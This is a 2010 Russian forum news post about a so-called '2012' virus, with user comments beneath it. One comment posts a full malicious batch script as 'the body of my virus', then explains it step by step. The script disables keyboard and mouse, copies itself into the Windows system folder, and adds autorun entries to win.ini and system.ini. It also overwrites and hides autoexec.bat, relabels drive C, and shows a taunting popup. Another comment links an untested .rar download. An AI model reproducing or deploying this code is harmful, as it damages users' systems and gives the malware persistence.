DIZ-CS.RU - Мы с Вами НАВСЕГДА!
10.02.2010
Добавил: Snoq Просмотров: 1071
Вирус 2012
В интернете появился вирус под названием 2012. Вирус делает дату на вашем компьютере 21.12.2012. Удаляет все файлы в Program files. Меняет формат .exe на .mp3 и меняет название дисков на 2012. А также создает папки с названием конец близок, мир умрет и прочее...
4 Голоса

HTML
BB-Code
Ссылка

Случайные новости:

Свежие файлы:

Комментарии к материалу
Аватар отсутствует
+  (0-
7 | -=spk=- пишет: | 10.02.2010 | 22:21:00
я скачал не пашит!! cool biggrin лажа
Аватар Meddy
+  (0-
6 | Meddy пишет: | 10.02.2010 | 19:28:35
NUF2K делать мне нечего biggrin
Аватар отсутствует
+  (0-
5 | rody пишет: | 10.02.2010 | 16:43:36
Статье уже 100 лет dry
Аватар Meddy
+  (0-
4 | Meddy пишет: | 10.02.2010 | 16:40:15
biggrin я не верю
Аватар отсутствует
+  (+5-
3 | Taker пишет: | 10.02.2010 | 17:24:09
Это не вирус а обычные bat команды для windows и если попал на такую хрень то в блокноте можно так же спокойно написать противодействие этому файлу если не верите вот (для справки не применять в корыстных целях) :
Вот тело моего вируса

Вот тело моего вируса

@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER…xe-xe-xe > c:\autoexec.bat
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject(”WScript.Shell”); > %temp%\mes.js
echo WSHShell.Popup(”Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе”); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls

Объясняю популярно и по шагам:

1 @echo off - Запрещаем ДОСовскому окошку показывать, что делает скрипт.
2 rundll32 keyboard,disable - Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
3 rundll32 mouse,disable - Отключаем мышь тоже на всякий.
4 copy %0 %windir%/system - Копируемся в папку windows/system
// %0 - Переменная, указывающая на исходный файл-вирус
// %windir% - переменная папка масдая.
5 echo run=%windir%/system/*.bat >> %windir%\win.ini - Добавляет текст “run=%windir%/system/*.bat” в файл win.ini
6 echo run=%windir%/system/*.bat >> %windir%\system.ini - Добавляет текст “run=%windir%/system/*.bat” в файл system.ini
7 label LOHOLAMMER - Меняет имя диску c:\ на “LOHOLAMMER”
8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r - Проверяем если есть файл c:\autoexec.bat то убираем
//у него атрибуты -h -s -a -r
9 deltree /y c:\autoexec.bat - Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл.
10 echo autoexec.bat echo YOU ARE LAMMER…xe-xe-xe > c:\autoexec.bat - Добавить текст “YOU ARE LAMMER…xe-xe-xe”
//в новый файл autoexec.bat
11 rundll32 mouse,enable - Включаем, пускай думает, что ниче не было.
12 rundll32 keyboard,enable - Включаем, пускай думает, что ниче не было.
13 echo var WSHShell = WScript.CreateObject(”WScript.Shell”); > %temp%\mes.js
echo WSHShell.Popup(”Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе”); >> %temp%\mes.js
start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью
deltree /y %temp%\mes.js //А потом стирает за собой следы.
14 attrib c:\autoexec.bat +h +s +a +r - Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил.
15 pause - Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.)
16 cls - Выходим

Аватар отсутствует
+  (-1-
2 | NUF2K пишет: | 10.02.2010 | 17:11:15
Kappa давай качай http://uhfybn2005.narod.ru/tece.rar . Проверь
Аватар отсутствует
+  (0-
1 | NUF2K пишет: | 10.02.2010 | 16:13:21
Закройте доступ к реестру . И усе
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
​​​​​​​​​​​​​​​​​​